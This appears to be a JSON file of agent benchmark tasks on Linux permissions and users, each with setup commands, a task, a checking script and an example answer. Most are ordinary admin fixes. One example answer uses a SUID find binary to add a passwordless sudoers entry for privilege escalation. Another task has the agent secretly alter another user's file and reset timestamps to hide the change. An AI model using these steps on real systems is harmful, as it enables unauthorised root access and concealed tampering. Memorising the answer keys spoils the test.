[
  {
    "create": {
      "type": "command",
      "data": ""
    },
    "init": {
      "type": "command",
      "data": "useradd -s /bin/bash -d /home/jack -m jack && cd /home/jack && echo 'echo a3b0c7' > test && chmod 000 test && chown jack test &&su - jack"
    },
    "description": "execute ~/test and get the output",
    "evaluation": {
      "type": "ground-truth",
      "answer": "a3b0c7",
      "checking": null,
      "example": {
        "type": "command",
        "data": "chmod 777 test && ~/test"
      }
    },
    "labels": [
      "permission",
      "user"
    ],
    "difficulty": 1
  },
  {
    "create": {
      "type": "command",
      "data": ""
    },
    "init": {
      "type": "command",
      "data": "echo 'test' > /testfile && useradd -s /bin/bash -d /home/jack -m jack && useradd -s /bin/bash -d /home/bill -m bill && useradd -s /bin/bash -d /home/tom -m tom && useradd -s /bin/bash -d /home/george -m george"
    },
    "description": "make /testfile readable to jack, bill and tom, but not george",
    "evaluation": {
      "type": "operation-checking",
      "answer": null,
      "checking": {
        "type": "command",
        "data": "(runuser -l jack -c 'cat /testfile' && runuser -l bill -c 'cat /testfile' && runuser -l tom -c 'cat /testfile' && runuser -l george -c 'cat /testfile') | if [ \"$(cat -)\" = \"test\"$'\\n'\"test\"$'\\n'\"test\" ]; then exit 0; else exit 1; fi"
      },
      "example": {
        "type": "command",
        "data": "groupadd tmp && usermod -a -G tmp jack && usermod -a -G tmp bill && usermod -a -G tmp tom && chmod 640 /testfile && chgrp tmp /testfile"
      }
    },
    "labels": [
      "permission",
      "user"
    ],
    "difficulty": 1
  },
  {
    "create": {
      "type": "command",
      "data": ""
    },
    "init": {
      "type": "command",
      "data": "useradd -s /bin/bash -d /home/hansen -m hansen && chmod -x /home/hansen && su - hansen"
    },
    "description": "Why can't I use `cd ~`? Help me fix it.",
    "evaluation": {
      "type": "operation-checking",
      "answer": null,
      "checking": {
        "type": "command",
        "data": "cd ~"
      },
      "example": {
        "type": "command",
        "data": "chmod 750 ~"
      }
    },
    "labels": [
      "permission",
      "user"
    ],
    "difficulty": 2
  },
  {
    "create": {
      "type": "command",
      "data": ""
    },
    "init": {
      "type": "command",
      "data": "apt update && apt install sudo -y && useradd -s /bin/bash -d /home/hansen -m hansen && chmod u+s /usr/bin/find && su - hansen"
    },
    "description": "You are a common user. There's a vulnerability in the system (Hint: related to SUID). Find it and exploit it so that you can execute sudo without password",
    "evaluation": {
      "type": "operation-checking",
      "answer": null,
      "checking": {
        "type": "command",
        "data": "(whoami && sudo whoami) | if [ \"$(cat -)\" = \"hansen\"$'\\n'\"root\" ]; then exit 0; else exit 1; fi"
      },
      "example": {
        "type": "command",
        "data": "cd ~ && touch tmp && find tmp -exec /bin/bash -p -c \"echo 'hansen ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers\" \\; # MAY NEED EXECUTE FIRST: find / -user root -perm -4000 -print 2>/dev/null"
      }
    },
    "labels": [
      "permission"
    ],
    "difficulty": 3
  },
  {
    "create": {
      "type": "command",
      "data": ""
    },
    "init": {
      "type": "command",
      "data": "chmod u+s /usr/bin/find"
    },
    "description": "There's a vulnerability in the system (Hint: related to SUID). Find it and fix it.",
    "evaluation": {
      "type": "operation-checking",
      "answer": null,
      "checking": {
        "type": "command",
        "data": "ls -l /usr/bin/find | awk '{if ($1~/^-..s/) { exit 1; } else { exit 0; }}'"
      },
      "example": {
        "type": "command",
        "data": "chmod u-s /usr/bin/find"
      }
    },
    "labels": [
      "permission"
    ],
    "difficulty": 3
  },
  {
    "create": {
      "type": "command",
      "data": ""
    },
    "init": {
      "type": "command",
      "data": "cd ~ && mkdir videos && cd videos && mkdir old && mkdir new && touch vid1 && touch vid2 && touch new/a && touch new/b && touch old/c"
    },
    "description": "set all files in ~/videos to be 660, and all directories(include ~/videos) to be 750",
    "evaluation": {
      "type": "operation-checking",
      "answer": null,
      "checking": {
        "type": "command",
        "data": "(find ~/videos -type f ! -perm 660 -ls && find ~/videos -type d ! -perm 750 -ls) | if [ \"$(cat -)\" = \"\" ]; then exit 0; else exit 1; fi"
      },
      "example": {
        "type": "command",
        "data": "find ~/videos -type f -exec chmod 660 {} + && find ~/videos -type d -exec chmod 750 {} +"
      }
    },
    "labels": [
      "permission"
    ],
    "difficulty": 1
  },
  {
    "create": {
      "type": "command",
      "data": ""
    },
    "init": {
      "type": "command",
      "data": "apt update && apt install sudo -y && echo '' > /etc/sudoers"
    },
    "description": "ahh! Why can't I use sudo??? Is it because the WiFi I'm using? fix it!!!",
    "evaluation": {
      "type": "operation-checking",
      "answer": null,
      "checking": {
        "type": "command",
        "data": "sudo whoami | if [ \"$(cat -)\" = \"root\" ]; then exit 0; else exit 1; fi"
      },
      "example": {
        "type": "command",
        "data": "echo 'Defaults        env_reset\nDefaults        mail_badpass\nDefaults        secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\"\nroot    ALL=(ALL:ALL) ALL\n%admin ALL=(ALL) ALL\n%sudo   ALL=(ALL:ALL) ALL' > /etc/sudoers"
      }
    },
    "labels": [
      "permission"
    ],
    "difficulty": 3
  },
  {
    "create": {
      "type": "command",
      "data": ""
    },
    "init": {
      "type": "command",
      "data": "mkdir /data"
    },
    "description": "Suppose you have a directory called /data that contains sensitive files that should only be accessible to members of the group \"dataaccess\". Ensure that new files and directories created in this directory inherit the group ownership, and that users can only delete files and directories that they own",
    "evaluation": {
      "type": "operation-checking",
      "answer": null,
      "checking": {
        "type": "command",
        "data": "ls -l / | grep data | awk '{if ($1~/^d.....s..t/) { exit 0; } else { exit 1; } }'"
      },
      "example": {
        "type": "command",
        "data": "chmod g+s /data && chmod +t /data"
      }
    },
    "labels": [
      "permission"
    ],
    "difficulty": 2
  },
  {
    "create": {
      "type": "command",
      "data": ""
    },
    "init": {
      "type": "command",
      "data": "useradd -s /bin/bash -d /home/tom -m tom && cd /home/tom && mkdir videos && cd videos && mkdir old && mkdir new && touch vid1 && touch vid2 && touch new/a && touch new/b && touch old/c && find ~/videos -type f -exec chmod 600 {} + && find ~/videos -type d -exec chmod 700 {} + && find . -exec touch -t 202206101200 {} + && useradd -s /bin/bash -d /home/mike -m mike && echo 'tom ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers && cd /home/mike && su - mike"
    },
    "description": "tom have some videos at his home, you have to secretly add 'haha, mike is here!'(without quote) to the end of the video with the smallest lexicographical order and don't let tom know this by checking properties of files or directories",
    "evaluation": {
      "type": "operation-checking",
      "answer": null,
      "checking": {
        "type": "command",
        "data": "sudo ls -l -R -a /home/tom/videos | awk '{if (!/^[drwx------|-rw-------]/) { exit 1; } else { exit 0; }}' && (touch -t 202206101200 /tmp/ref_file && sudo find /home/tom/videos ! -type d -newer /tmp/ref_file -print -quit && find /home/tom/videos ! -type d -newer /tmp/ref_file -print -quit) | if [ \"$(cat -)\" = \"\" ]; then exit 0; else exit 1; fi"
      },
      "example": {
        "type": "command",
        "data": "sudo echo 'haha, mike is here!' >> /home/tom/videos/new/a && cd /home && sudo find . -exec touch -t 202206101200 {} +"
      }
    },
    "labels": [
      "permission"
    ],
    "difficulty": 3
  },
  {
    "create": {
      "type": "command",
      "data": ""
    },
    "init": {
      "type": "command",
      "data": "apt remove sudo"
    },
    "description": "Why can't I use sudo?? fix it.",
    "evaluation": {
      "type": "operation-checking",
      "answer": null,
      "checking": {
        "type": "command",
        "data": "sudo whoami | if [ \"$(cat -)\" = \"root\" ]; then exit 0; else exit 1; fi"
      },
      "example": {
        "type": "command",
        "data": "apt update && apt install sudo -y"
      }
    },
    "labels": [
      "permission"
    ],
    "difficulty": 1
  }
]
